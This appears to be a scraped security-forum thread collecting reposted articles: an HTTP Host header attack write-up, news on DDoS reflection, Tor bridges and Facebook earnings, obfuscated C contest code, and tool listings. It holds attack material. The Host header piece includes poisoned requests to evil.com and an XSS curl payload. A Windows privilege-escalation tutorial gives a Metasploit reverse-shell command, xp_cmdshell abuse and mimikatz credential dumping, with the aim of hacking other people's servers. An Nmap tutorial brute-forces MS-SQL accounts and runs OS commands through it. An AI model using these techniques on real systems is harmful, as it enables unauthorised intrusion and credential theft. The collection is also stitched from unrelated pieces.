[h=3]Practical HTTP Host header attacks[/h] [h=2][/h] [h=3]Password reset and web-cache poisoning[/h] [h=4](And a little surprise in RFC-2616)[/h] [h=3]Introduction[/h] How does a deployable web-application know where it is? Creating a trustworthy absolute URI is trickier than it sounds. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to: <link href="http://_SERVER['HOST']" (Joomla) ...and append secret keys and tokens to links containing it: <a href="http://_SERVER['HOST']?token=topsecret"> (Django, Gallery, others) ....and even directly import scripts from it: <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4"> (Various) There are two main ways to exploit this trust in regular web applications. The first approach is web-cache poisoning; manipulating caching systems into storing a page generated with a malicious Host and serving it to others. The second technique abuses alternative channels like password reset emails where the poisoned content is delivered directly to the target. In this post I'll look at how to exploit each of these in the presence of 'secured' server configurations, and how to successfully secure applications and servers. [h=3]Password reset poisoning[/h] Popular photo-album platform Gallery uses a common approach to forgotten password functionality. When a user requests a password reset it generates a (now) random key: Places it in a link to the site: and emails to the address on record for that user. [Full code] When the user visits the link, the presence of the key proves that they can read content sent to the email address, and thus must be the rightful owner of the account. The vulnerability was that url::abs_site used the Host header provided by the person requesting the reset, so an attacker could trigger password reset emails poisoned with a hijacked link by tampering with their Host header: > POST /password/reset HTTP/1.1 > Host: evil.com > ... > csrf=1e8d5c9bceb16667b1b330cc5fd48663&name=admin This technique also worked on Django, Piwik and Joomla, and still works on a few other major applications, frameworks and libraries that I can't name due to an unfortunate series of mistakes on my part. Of course, this attack will fail unless the target clicks the poisoned link in the unexpected password reset email. There are some techniques for encouraging this click but I'll leave those to your imagination. In other cases, the Host may be URL-decoded and placed directly into the email header allowing mail header injection. Using this, attackers can easily hijack accounts by BCCing password reset emails to themselves - Mozilla Persona had an issue somewhat like this, back in alpha. Even if the application's mailer ignores attempts to BCC other email addresses directly, it's often possible to bounce the email to another address by injecting \r\nReturn-To: attacker@evil.com followed by an attachment engineered to trigger a bounce, like a zip bomb. [h=3]Cache poisoning[/h] Web-cache poisoning using the Host header was first raised as a potential attack vector by Carlos Beuno in 2008. 5 years later there's no shortage of sites implicitly trusting the host header so I'll focus on the practicalities of poisoning caches. Such attacks are often difficult as all modern standalone caches are Host-aware; they will never assume that the following two requests reference the same resource: > GET /index.html HTTP/1.1 > GET /index.html HTTP/1.1 > Host: example.com > Host: evil.com So, to persuade a cache to serve our poisoned response to someone else we need to create a disconnect between the host header the cache sees, and the host header the application sees. In the case of the popular caching solution Varnish, this can be achieved using duplicate Host headers. Varnish uses the first host header it sees to identify the request, but Apache concatenates all host headers present and Nginx uses the last host header. This means that you can poison a Varnish cache with URLs pointing at evil.com by making the following request: > GET / HTTP/1.1 > Host: example.com > Host: evil.com Application-level caches can also be susceptible. Joomla writes the Host header to every page without HTML-encoding it, and its cache is entirely oblivious to the Host header. Gaining persistent XSS on the homepage of a Joomla installation was as easy as: curl -H "Host: cow\"onerror='alert(1)'rel='stylesheet'" http://example.com/ | fgrep cow\" This will create the following request: > GET / HTTP/1.1 > Host: cow"onerror='alert(1)'rel='stylesheet' The response should show a poisoned <link> element: <link href="http://cow"onerror='alert(1)'rel='stylesheet'/" rel="canonical"/> To verify that the cache has been poisoned, just load the homepage in a browser and observe the popup. [h=3]'Secured' configurations[/h] So far I've assumed that you can make a HTTP request with an arbitrary Host header arrive at any application. Given that the intended purpose of the Host header is to ensure that a request is passed to the correct application at a given IP address, it's not always that simple. Sometimes it is trivial. If Apache receives an unrecognized Host header, it passes it to the first virtual host defined in httpd.conf. As such, it's possible to pass requests with arbitrary host headers directly to a sizable number of applications. Django was aware of this default-vhost risk and responded by advising that users create a dummy default-vhost to act as a catchall for requests with unexpected Host headers, ensuring that Django applications never got passed requests with unexpected Host headers. The first bypass for this used X-Forwarded-For's friend, the X-Forwarded-Host header, which effectively overrode the Host header. Django was aware of the cache-poisoning risk and fixed this issue in September 2011 by disabling support for the X-Forwarded-Host header by default. Mozilla neglected to update addons.mozilla.org, which I discovered in April 2012 with the following request: > POST /en-US/firefox/user/pwreset HTTP/1.1> Host: addons.mozilla.org > X-Forwarded-Host: evil.com Even patched Django installations were still vulnerable to attack. Webservers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful http://username:password@domain.com syntax: > POST /en-US/firefox/user/pwreset HTTP/1.1> Host: addons.mozilla.org:@passwordreset.net This resulted in the following (admittedly suspicious) password reset link: https://addons.mozilla.org:@passwordreset.net/users/pwreset/3f6hp/3ab-9ae3db614fc0d0d036d4 If you click it, you'll notice that your browser sends the key to passwordreset.net before creating the suspicious URL popup. Django released a patch for this issue shortly after I reported it: https://www.djangoproject.com/weblog/2012/oct/17/security/ Unfortunately, Django's patch simply used a blacklist to filter @ and a few other characters. As the password reset email is sent in plaintext rather than HTML, a space breaks the URL into two separate links: > POST /en-US/firefox/users/pwreset HTTP/1.1 > Host: addons.mozilla.org: www.securepasswordreset.com Django's followup patch ensured that the port specification in the Host header could only contain numbers, preventing the port-based attack entirely. However, the arguably ultimate authority on virtual hosting, RFC2616, has the following to say: 5.2 The Resource Identified by a Request [...] If Request-URI is an absoluteURI, the host is part of the Request-URI. Any Host header field value in the request MUST be ignored. The result? On Apache and Nginx (and all compliant servers) it's possible to route requests with arbitrary host headers to any application present by using an absolute URI: > POST https://addons.mozilla.org/en-US/firefox/users/pwreset HTTP/1.1 > Host: evil.com This request results in a SERVER_NAME of addons.mozilla.org but a HTTP['HOST'] of evil.com. Applications that use SERVER_NAME rather than HTTP['HOST'] are unaffected by this particular trick, but can still be exploited on common server configurations. See HTTP_HOST vs. SERVER_NAME for more information of the difference between these two variables. Django fixed this in February 2013 by enforcing a whitelist of allowed hosts. See the documentation for more details. However, these attack techniques still work fine on many other web applications. [h=3]Securing servers[/h] Due to the aforementioned absolute request URI technique, making the Host header itself trustworthy is almost a lost cause. What you can do is make SERVER_NAME trustworthy. This can be achieved under Apache (instructions) and Nginx (instructions) by creating a dummy vhost that catches all requests with unrecognized Host headers. It can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. I'd recommend using both approaches wherever possible. A patch for Varnish should be released shortly. As a workaround until then, you can add the following to the config file: import std; sub vcl_recv { collect(req.http.host); } [h=3]Securing applications[/h] Fixing this issue is difficult, as there is no entirely automatic way to identify which host names the administrator trusts. The safest, albeit mildly inconvenient solution, is to use Django's approach of requiring administrators to provide a whitelist of trusted domains during the initial site setup process. If that is too drastic, at least ensure that SERVER_NAME is used instead of the Host header, and encourage users to use a secure server configuration. [h=3]Further research[/h] More effective / less inconvenient fixes Automated detection Exploiting wildcard whitelists with XSS & window.history Exploiting multipart password reset emails by predicting boundaries Better cache fuzzing (trailing Host headers?) Thanks to Mozilla for funding this research via their bug-bounty program, Varnish for the handy workaround, and the teams behind Django, Gallery, and Joomla for their speedy patches. Feel free to drop a comment, email or DM me if you have any observations or queries. Sursa: http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

[h=1]Sagan v0.3.0 Released[/h] Sagan is an open source (GNU/GPLv2) high performance, real-time log analysis & correlation engine that run under *nix operating systems (Linux/FreeBSD/ OpenBSD/etc). It is written in C and uses a multi-threaded architecture to deliver high performance log & event analysis. Sagan’s structure and rules work similarly to the Sourcefire “Snort” IDS/IPS engine. This was intentionally done to maintain compatibility with rule management software (oinkmaster/pulledpork /etc) and allows Sagan to correlate log events with your Snort IDS/IPS system. Sagan can also write to Snort IDS/IPS databases via Unified2/Barnyard2. Sagan is compatible with all Snort “consoles”. For example, Sagan is will work with Snorby (http://www.snorby.org), Sguil (http://sguil.sourceforge.net), BASE, the Prelude IDS framework (https://www.prelude-ids.org) and proprietary consoles! (to name a few). [h=3]Changelog v0.3.0[/h] The biggest change is that Sagan is now capable of utilizing all CPUs/cores. While Sagan has always been multi-threaded to prevent I/O blocking, previous versions could only utilize one core for event analysis. This is no longer the case–Sagan will now use any and all CPUs available, which means that Sagan can digest, parse and analyze even higher number of events per/second. Introduction of “processors.” Processors provide Sagan the ability to analyze logs using methods other than traditional signature based technology. Current Processors are: Blacklist – Search log messages for blacklisted IP addresses. Search – Search logs for keyword terms (ie – domain names, etc) Track Clients – Informs you when systems aren’t logging properly. Websense Threatseeker – Queries the Websense Threatseeker network for reputation data (Not include with the GPLv2 release). More processors are currently in development. The direct SQL output plugin has been removed, in order to maintain full compatibility with Snort. To write to a SQL database, use Unified2 output and Barnyard2. Introduction of port variables ($SSH_PORT, $DNS_PORT) in rules. More normalization and parsing options (parse_src_ip, parse_proto, etc). Sagan currently has over five thousand signatures/rules. More Information: here Download Sagan v0.3.0 Sursa: Sagan v0.3.0 Released | ToolsWatch.org - The Hackers Arsenal Tools | Repository for vFeed and DPE Projects

[h=1]Aging networking protocols abused in DDoS attacks[/h][h=2]Printers, routers and many other Internet-connected devices can be used in an attack[/h][h=3]By Jeremy Kirk[/h] May 01, 2013 — IDG News Service — Aging networking protocols still employed by nearly every Internet-connected device are being abused by hackers to conduct distributed denial-of-service (DDoS) attacks. Security vendor Prolexic found that attackers are increasingly using the protocols for what it terms "distributed reflection denial-of-service attacks" (DrDos), where a device is tricked into sending a high volume of traffic to a victim's network. "DrDos protocol reflection attacks are possible due to the inherent design of the original architecture," Prolexic wrote in a white paper. "When these protocols were developed, functionality was the main focus, not security." Government organizations, banks and companies are targeted by DDoS attacks for a variety of reasons. Hackers sometimes use DDoS attacks to draw attention away from other mischief or want to disrupt an organization for political or philosophical reasons. One of the targeted protocols, known as Network Time Protocol (NTP), is used in all major operating systems, network infrastructure and embedded devices, Prolexic wrote. It is used to synchronize clocks among computers and servers. A hacker can launch at attack against NTP by sending many requests for updates. By spoofing the origin of the requests, the NTP responses can be directed at a victim host. It appears the attackers are abusing a monitoring function in the protocol called NTP mode 7 (monlist). The gaming industry has been targeted by this style of attack, Prolexic said. Other network devices, such as printers, routers, IP video cameras and a variety of other Internet-connected equipment use an application layer protocol called Simple Network Management Protocol (SNMP). SNMP communicates data about device components, Prolexic wrote, such as measurements or sensor readings. SNMP devices return three times as much data as when they're pinged, making them an effective way to attack. Again, an attacker will send a spoofed IP request to an SNMP host, directing the response to a victim. Prolexic wrote there are numerous ways to mitigate an attack. The best advice is to disable SNMP if it is not needed. The U.S. Computer Emergency Readiness Team warned administrators in 1996 of a potential attack scenario involving another protocol, Character Generator Protocol, or CHARGEN. It is used as a debugging tool since it sends data back regardless of the input. But Prolexic wrote that it "may allow attackers to craft malicious network payloads and reflect them by spoofing the transmission source to effectively direct it to a target. This can result in traffic loops and service degradation with large amounts of network traffic." CERT recommended at that time to disable any UDP (User Datagram Protocol) service such as CHARGEN if it isn't needed. Sursa: Aging networking protocols abused in DDoS attacks - CSO Online - Security and Risk

[h=1]Facebook Q1 Earnings: Striking Mobile Revenue Growth[/h]May 1st, 2013, 20:37 GMT · By Gabriela Vatu Facebook has barely exceeded estimates and reported revenues of $1.458 billion (€1.105 billion) for the first quarter of 2013 and it also announced a 54% increase in mobile revenues. The company has published their first quarterly results of 2013. Overall, Facebook's revenues exceeded the $1.44 billion (€1.09 billion) estimates of Wall Street specialists. The social network also brought in over $751 million (€570 million) in mobile revenue in the first quarter, which is a 54% increase year-over-year. This has been extremely important to investors over the past year, so such an increase in this division is expected to cause a rise in stock prices for Facebook. Out of the company’s overall result for the first three months, 85% came from advertising. Facebook has managed to garner $1.25 billion (€0.94 billion) by selling ads, which is 43% more than last year. Mobile ads also played an important part, as they represented 30% of the total ad revenue, which is over Wall Street expectations. Facebook’s net income for the first quarter was of $219 million (€166 million), a small increase over last year’s results, when they had profits of $205 million (€155 million). The social network giant also announced that they have cash and marketable securities of $9.5 billion (€7.2 billion) at the end of the quarter. “We’ve made a lot of progress in the first few months of the year,” Mark Zuckerberg, Facebook CEO said at the conference. He continued by saying that they’ve seen strong growth and engagement across the community, as well as launched several exciting products. Facebook daily active users number also increased with 26% over the last year up to 665 million on average in March. The monthly active users number also grew significantly, reaching 1.11 billion. This represents a 23% increase over last year. David Spillane, Facebook’s Chief Accounting Officer has announced that he will be leaving the company. Sursa: Facebook Q1 Earnings: Striking Mobile Revenue Growth - Softpedia

http://www.youtube.com/watch?v=ghC_UCavA5o&feature=share

Super.

242 rows affected. ( Query took 0.0078 sec )

[h=3]Hacking Windows Servers - Privilege Escalation [/h] Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks. But, these get the job done only on Linux servers. What about windows servers? Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges. Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure. Using meterpreter payload to get a reverse shell over the target machine. Using browser_autopwn. (Really...) Using other tools like pwdump7, mimikatz, etc. Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above. 1. Using xp_cmdshell- Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work. If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website. You must be wondering why only "sa"? Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server. The picture below shows the connection string containing login credentials of "sa" account. Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path. So, after getting the "sa" account, we can login remotely using HeidiSQL HeidiSQL is an awesome tool to connect to remote database servers. You can download it here. After logging into MSSQL server with sa account, we get a list of databases and their contents. Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges) Syntax for the query is- xp_cmdshell '[command]' For example, if I need to know my current privileges, I would query- xp_cmdshell 'whoami' This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy. Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP. Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online. 2. Meterpreter Payload- This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands. Using metasploit, generate a reverse shell payload binary. For example- msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe Now we will upload this executable to the server using our web backdoor. Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly) Now it's time to execute the payload. If everything goes right, we will get a meterpreter session over the target machine as shown below- We can also use php, asp or other payloads. 3. Browser Autopwn- This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment. Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands. I think it is clear by now that what I'm trying to explain We can start Internet Explorer from command line and make it browse to a specific URL. Syntax for this- iexplore.exe Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection. 4. Using readily available tools- Tools like pwdump and mimikatz can crack passwords of windows users. #pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper. The following screenshot shows NTLM hashes from pwdump7: #mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it. Following picture shows plain text passwords from mimikatz: You can google about them and learn how to use these tools and what actually they exploit to get the job done for you. I hope you can now exploit every another windows server. Happy Hacking About The Author This article has been written by Deepankar Arora, He is an independent security researcher from India, He has been listed in various hall of fames. Sursa: Hacking Windows Servers - Privilege Escalation | Learn How To Hack - Ethical Hacking and security tips

[h=1]Tor calls for help as its supply of bridges falters[/h][h=2]Bridges help users in countries like China and Iran access the network.[/h] by Sean Gallagher - Apr 17 2013, 7:23pm GTBDT Just like the US highway infrastructure, Tor needs new bridges. The encrypted anonymizing "darknet" that allows activists, journalists, and others to access the Internet without fear of censorship or monitoring—and which has also become a favored technology of underground groups like child pornographers—is having increasing difficulty serving its users in countries that have blocked access to Tor's entry points. Tor bridges are computers that act as hidden gateways to Tor's darknet of relays. After campaigning successfully last year to get more volunteers to run obfuscated Tor bridges to support users in Iran trying to evade state monitoring, the network has lost most of those bridges, according to a message to the Tor relays mailing list by Tor volunteer George Kadiankakis. "Most of those bridges are down, and fresh ones are needed more than ever," Kadiankakis wrote in an e-mail, "since obfuscated bridges are the only way for people to access Tor in some areas of the world (like China, Iran, and Syria)." Obfuscated bridges allow users to connect to the Tor network without using one of the network's known public bridges or relays as an initial entry point. Obfuscated bridges have become a necessity for Tor users in countries with networks guarded by various forms of deep packet inspection technology, where censors have put in place filters that spot traffic matching the signature of a Tor-protected connection. Some of these censors use a blocking list for traffic to known Tor bridges. To circumvent detection, Tor users can use a plugin called a "pluggable transport" to connect to an obfuscated bridge and mask their network signature. To further evade potential censoring, the addresses for obfuscated bridges are not part of Tor's main directory but are stored in a distributed database called BridgeDB. The BridgeDB's interface spoons out addresses two at a time per request in an effort to prevent attacks to expose a full list, and no BridgeDB instance keeps a full list of the available bridges. Additionally, Tor provides "unpublished" bridge addresses to users who request them via e-mail. The Tor Project's support assistants—volunteers who respond to support requests—only respond to requests to e-mails from Gmail and Yahoo e-mail accounts to both deal with the flood of requests and reduce the chance that an attacker will be able to learn the addresses of a large number of bridges. The problem for Tor is that those bridges do get detected by attackers over time, and pluggable transports can eventually be detected. The most widely used pluggable transport in the Tor network, obfs2, no longer works in China. A new plugin, obfs3, will work in China, but it runs only on the latest version of the obfuscated bridge proxy—which was recently rewritten in Python. "Looking into BridgeDB," Kadiankakis wrote in his message to the Tor community, "we have 200 obfs2 bridges, but only 40 obfs3 bridges: this means that we need more people running the new Python obfsproxy! Upgrading obfsproxy should be easy now, since we prepared new instructions and Debian/Ubuntu packages." He added that there is also a particular need for more unpublished bridges. For those who want to donate bridges to the Tor network, the easiest route is to use Tor Cloud, an Amazon Web Service Elastic Compute Cloud image created by the Tor Project that allows people to leverage Amazon's free usage tier to deploy a bridge. Sursa: http://arstechnica.com/information-technology/2013/04/tor-calls-for-help-as-its-supply-of-bridges-falters/

[C] Love letter (obfuscated C contest 1990) char*lie; double time, me= !0XFACE, not; int rested, get, out; main(ly, die) char ly, **die ;{ signed char lotte, dear; (char)lotte--; for(get= !me;; not){ 1 - out & out ;lie;{ char lotte, my= dear, **let= !!me *!not+ ++die; (char*)(lie= "The gloves are OFF this time, I detest you, snot\n\0sed GEEK!"); do {not= *lie++ & 0xF00L* !me; #define love (char*)lie - love 1s *!(not= atoi(let [get -me? (char)lotte- (char)lotte: my- *love - 'I' - *love - 'U' - 'I' - (long) - 4 - 'U' ])- !! (time =out= 'a'));} while( my - dear && 'I'-1l -get- 'a'); break;}} (char)*lie++; (char)*lie++, (char)*lie++; hell:0, (char)*lie; get *out* (short)ly -0-'R'- get- 'a'^rested; do {auto*eroticism, that; puts(*( out - 'c' -('P'-'S') +die+ -2 ));}while(!"you're at it"); for (*((char*)&lotte)^= (char)lotte; (love ly) [(char)++lotte+ !!0xBABE]{ if ('I' -lie[ 2 +(char)lotte]){ 'I'-1l ***die; } else{ if ('I' * get *out* ('I'-1l **die[ 2 ])) *((char*)&lotte) -= '4' - ('I'-1l); not; for(get=! get; !out; (char)*lie & 0xD0- !not) return!! (char)lotte;} (char)lotte; do{ not* putchar(lie [out *!not* !!me +(char)lotte]); not; for(;!'a';}while( love (char*)lie);{ register this; switch( (char)lie [(char)lotte] -1s *!out) { char*les, get= 0xFF, my; case' ': *((char*)&lotte) += 15; !not +(char)*lie*'s'; this +1s+ not; default: 0xF +(char*)lie;}}} get - !out; if (not--) goto hell; exit( (char)lotte);} Sursa: http://www0.us.ioccc.org/1990/westley.c PS: E posibil sa primiti o eroare cu invalid suffix "s". Puneti si voi "L" sau "5" in locul acelui "s".

Pen Testing SQL Servers With Nmap The Nmap Scripting Engine has transform Nmap from a regular port scanner to a penetration testing machine.With the variety of the scripts that exists so far we can even perform a full penetration test to an SQL database without the need of any other tool.In this tutorial we will have a look in these scripts,what kind of information these extract from the database and how we can exploit the SQL server and execute system commands through Nmap. Most SQL databases run on port 1433 so in order to discover information regarding the database we need to execute the following script: Obtain SQL Information – Nmap So we already have the database version and the instance name.The next step is to check whether there is a weak password for authentication with the database.In order to achieve that we need to run the following nmap script which it will perform a brute force attack. Brute Force Weak MS-SQL Accounts – Nmap As we can see in this case we didn’t discover any credentials.If we want we can use this script with our own username and password lists in order to discover a valid database account with this command: nmap -p1433 –script ms-sql-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt However we can always try another script which can check for the existence of null passwords on Microsoft SQL Servers. Check For Null passwords on SA accounts – Nmap Now we know that the sa account has not a password.We can use this information in order to connect with the database directly or to continue to execute further Nmap scripts that require valid credentials.If we want to know in which databases the sa account has access to or any other account that we have discovered we can run the ms-sql-hasdbaccess script with the following arguments: Discover which user has access to which db – Nmap We can even query the Microsoft SQL Server via Nmap in order to obtain the database tables. List Tables – Nmap In 2000 version of SQL Server xp_cmdshell is enabled by default so we can even execute operating system commands through Nmap scripts as it can be seen in the image below: Run OS command via xp_cmdshell – Nmap Run net users via xp_cmdshell – Nmap Last but not least we can run a script to extract the database password hashes for cracking with tools like john the ripper. Dump MS-SQL hashes – Nmap In this case we didn’t have any hashes because there was only one account on the database the sa which has null password. Sursa: Pen Testing SQL Servers With Nmap | Penetration Testing Lab

PeStudio [TABLE=class: fborder] [TR] [TD=class: fcaption, colspan: 2, align: left]PeStudio 6.70 [/TD] [/TR] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Marc Ochsenmeier[/TD] [/TR] [TR] [TD=class: forumheader3]Author email[/TD] [TD=class: forumheader3] info©winitor.com[/TD] [/TR] [TR] [TD=class: forumheader3]Author website[/TD] [TD=class: forumheader3]winitor[/TD] [/TR] [TR] [TD=class: forumheader3]Description[/TD] [TD=class: forumheader3]PeStudio is a free tool which can be used to perform static analysis of any Windows application and reveals not only Raw-data, but also Indicators of Trust. Executable files analyzed with PeStudio are never started. For this reason, you can analyze suspicious applications with PeStudio with no risk! Depending on how it is started PeStudio has a Graphical User Interface (GUI) or a Character-Based User Interface (CUI), which is especially useful when performing batch-mode oriented parsing of executable files. PeStudio has a set of unique features like looking-up for the image being analyzed on Virustotal, the possibility to start new instances of PeStudio with the dependencies of the image. PeStudio does a RAW access to the data of the Windows Portable Executable format. No Windows API is used to gather elements. A feature which is also unique to PeStudio is the ability to create an XML report of the image being analyzed.[/TD] [/TR] [TR] [TD=class: forumheader3]Image[/TD] [TD=class: forumheader3]no image available [/TD] [/TR] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]380 kB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 23 April 2013 - 08:56:45[/TD] [/TR] [TR] [TD=class: forumheader3]Downloads[/TD] [TD=class: forumheader3]86[/TD] [/TR] [TR] [TD=class: forumheader3]Download[/TD] [TD=class: forumheader3] [/TD] [/TR] [/TABLE] Sursa: PeStudio 6.70 / Portable Executable Tools / Downloads - Tuts 4 You